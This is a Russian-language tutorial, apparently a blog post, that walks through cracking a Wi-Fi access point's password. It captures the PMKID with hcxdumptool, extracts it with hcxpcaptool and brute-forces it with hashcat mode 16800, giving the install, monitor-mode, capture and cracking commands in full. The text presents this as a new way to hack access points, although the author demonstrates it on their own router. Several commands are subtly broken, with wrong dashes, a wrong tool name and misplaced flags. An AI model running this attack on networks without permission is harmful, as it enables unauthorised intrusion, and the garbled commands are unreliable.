Всем привет, сегодня я хочу рассказать вам о новом способе взлома беспроводной точки доступа. Как уже многие могли убедиться, он является более эффективным чем те, что мы использовали раньше. Поэтому начем!
Способ в том, чтобы заполучить специальный ключ PMKID, что переводится как Pairwise Master Key Identifier.
Этот ключ позволяет узнать PSK – Pre-Shared Key, а именно он как раз-таки и является паролем от точки доступа. Вы спросите, чем же отличается данные метод от нам привычных? А тем, что нам не нужно получать полный хеншейк, и понадобится лишь один кадр EOPOL, ну а также еще одна отличительная черта - это то, что вам не нужно будет ждать, пока подключится какой-либо пользователь к сети, которую вы собираетесь атаковать. Связано это с тем, что атака будет производится на саму AP.
Необходимое для совершения атаки:
1. Linux
2. hcxtools
3. Hcxdumptool
4. Hashcat v4.2.0
Установка всего необходимого:
Hcstools устанавливается точно так же как и hcxdumprool
1. git clone ZerBea/hcxtools
2. cd hcxtools
3. make
4. make install
Hashcat v4.2.0
Если у вас уже присутствует эта программа, но она ниже указанной версии, то, к сожалению, или к счастью, вы будете вынуждены ее удалить, а потом установить более новою версию. Либо же обновить ее другими способами, ведь это необходимо по той причине, что прошлые версию не могут расшифровать PMKID.
1. git clone hashcat/hashcat
2. cd hashcat
3. make
4. make install
Сразу хочу сказать, для примера, я буду проводить атаку на собственный роутер, который имеет последнюю прошивку.
Перевод беспроводного интерфейса в режим монитора
Сделать это можно двумя методами, вот первый.
Пишем этот код:
airmon-ng start wlan0
airmon-ng check kill
Готово, теперь рассмотрим второй способ.
Пишем этот код:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airmon-ng check kill
Запуск сканирования WiFi точек
Первым делом нам нужно запустить сканирование, сделать это можно данной командой:
airodump wlan0mon (wlan0 выбираем смотря из того, какой метод вы использовали)
После того как это будет выполнено, вам нужно будет сохранить BSSID необходимой точки AP без двоеточий в файл, сделать это можно с помощью такого кода:
echo "60A44C55D7C0" > filter.txt
Запуск Hcxdumptool
Запуск выполняется с помощью данной команды:
hcxdumptool –I wlan0 –o hash –filterlist=filter.txt --filtermode=2 -- enable_status=1
Теперь обо всем по порядку:
-i wlano – Эта строка указывает на название вашего интерфейса
-o hash – файл получаемый на выходе, в котором содержится PMKID
--filtermode=2 – укажет на то, что наш файл будет целевым списком
--filterlist=filter.txt – текстовый файл BSSID, который мы уже создали ранее.
--enable_status=1 – включения сообщний с помощью маски.
Теперь, когда вы все это запустите, то через некоторое время вам придет сообщение – Found PMKID, после этого мы отключаем данный скрипт. Что тут еще сказать? Данная программа на ура выполняет свои задачи и находит необходимые нам пакеты, поэтому продолжим.
Запуск hcxpcaptool
Для этого вводим команду:
hcxpcaptool –z hash_crack hash
Опять же расскажу, что это все значит:
-z hash_crack – это файл который мы получим нвыходе, где будет записан PMKID без лишнего мусора
Hash – файл в формате pcapng, в нем будут находится все найденые пакеты hcxdumptool
Запуск HASHCAT
Достаточно ввести эту команду:
hashcat –m 16800 –a 3 –w hash_crack ‘?u?s?d23456A’ --force
В этой команде я хочу сказать только про –m 16800, именно эта команда и появляется в новой версии HASHCAT
Итак, после этих действий вам будет выведет пароль по маске а также возможно два последних знака из данного пароля. Конечно, продолжать проверку больше суток я для примера не буду, поэтому введу несколько символов из своего пароля, после чего получил результат намного быстрее. А результатом как раз-таки был пароль.
На этом все, поэтому теперь можно сказать о том, что этот способ намного эффективнее других атак. Конечно скорость получения результата не так уж и сильно превосходит aircrack-ng, но если же вы имеет у себя в компьютере хорошую видеокарту, то с этим можно даже поспорить. А также, теперь вам не нужно ждать неопределенное количество временя в ожидании подключения пользователя, так как теперь не нужно будет перехватывать хеншейк.